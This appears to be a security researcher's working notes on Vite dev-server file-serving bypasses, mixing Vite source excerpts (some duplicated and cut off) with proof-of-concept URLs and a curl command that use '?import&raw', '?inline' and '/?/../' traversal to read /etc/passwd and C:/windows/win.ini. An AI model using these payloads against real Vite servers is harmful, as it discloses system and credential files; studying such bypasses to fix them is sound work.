http://localhost:5174/iife/@fs/C:/windows/win.ini?import&raw

export const rawRE = /(\?|&)raw(?:&|$)/

http://localhost:5174/iife/@fs/C:/windows/win.ini?import&raw??

const trailingSeparatorRE = /[?&]$/

export function removeTimestampQuery(url: string): string {

return url.replace(timestampRE, '').replace(trailingSeparatorRE, '')

http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init

export const inlineRE = /[?&]inline\b/

export async function fileToDevUrl(

environment: Environment,

id: string,

skipBase = false,

): Promise<string> {

const config = environment.getTopLevelConfig()

const publicFile = checkPublicFile(id, config)

// If has inline query, unconditionally inline the asset

const file = publicFile || cleanUrl(id)

const content = await fsp.readFile(file)

return assetToDataURL(environment, file, content)

}

export async function fileToDevUrl(

environment: Environment,

id: string,

skipBase = false,

): Promise<string> {

const config = environment.getTopLevelConfig()

const publicFile = checkPublicFile(id, config)

// If has inline query, unconditionally inline the asset

const file = publicFile || cleanUrl(id)

const content = await fsp.readFile(file)

return assetToDataURL(environment, file, content)

}

// If is svg and it's inlined in build, also inline it in dev to match

// the behaviour in build due to quote handling differences.

const file = publicFile || cleanUrl(id)

const content = await fsp.readFile(file)

return assetToDataURL(environment, file, content)

}

}

let rtn: string

if (publicFile) {

// in public dir during dev, keep the url as-is

rtn = id

} else if (id.startsWith(withTrailingSlash(config.root))) {

// in project root, infer short public path

rtn = '/' + path.posix.relative(config.root, id)

} else {

// outside of project root, use absolute fs path

// (this is special handled by the serve static middleware

rtn = path.posix.join(FS_PREFIX, id)

}

if (skipBase) {

return rtn

}

const base = joinUrlSegments(config.server.origin ?? '', config.decodedBase)

return joinUrlSegments(base, removeLeadingSlash(rtn))

http://localhost:5173/iife/C:/windows/win.ini?import&?.svg?.wasm?init

function shouldInline(

environment: Environment,

file: string,

id: string,

content: Buffer,

/** Should be passed only in build */

buildPluginContext: PluginContext | undefined,

forceInline: boolean | undefined,

): boolean {

if (noInlineRE.test(id)) return false

if (inlineRE.test(id)) return true

// Do build only checks if passed the plugin context during build

if (buildPluginContext) {

if (environment.config.build.lib) return true

if (buildPluginContext.getModuleInfo(id)?.isEntry) return false

}

if (forceInline !== undefined) return forceInline

if (file.endsWith('.html')) return false

// Don't inline SVG with fragments, as they are meant to be reused

if (file.endsWith('.svg') && id.includes('#')) return false

let limit: number

const { assetsInlineLimit } = environment.config.build

if (typeof assetsInlineLimit === 'function') {

const userShouldInline = assetsInlineLimit(file, content)

if (userShouldInline != null) return userShouldInline

limit = DEFAULT_ASSETS_INLINE_LIMIT

} else {

limit = Number(assetsInlineLimit)

}

return content.length < limit && !isGitLfsPlaceholder(content)

curl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'

http://localhost:5173/iife/@fs/C:/Users/swordlight/main/sec/analyse/vite-6.2.4/?/../../../../../../../windows/win.ini?import&raw

export function ensureServingAccess(

url: string,

server: ViteDevServer,

res: ServerResponse,

next: Connect.NextFunction,

): boolean {

if (isFileServingAllowed(url, server)) {

return true

}

if (isFileReadable(cleanUrl(url))) {

const urlMessage = `The request url "${url}" is outside of Vite serving allow list.`

const hintMessage = `

${server.config.server.fs.allow.map((i) => `- ${i}`).join('\n')}

Refer to docs https://vite.dev/config/server-options.html#server-fs-allow for configurations and more details.`

server.config.logger.error(urlMessage)

server.config.logger.warnOnce(hintMessage + '\n')

res.statusCode = 403

res.write(renderRestrictedErrorHTML(urlMessage + '\n' + hintMessage))

res.end()

} else {

// if the file doesn't exist, we shouldn't restrict this path as it can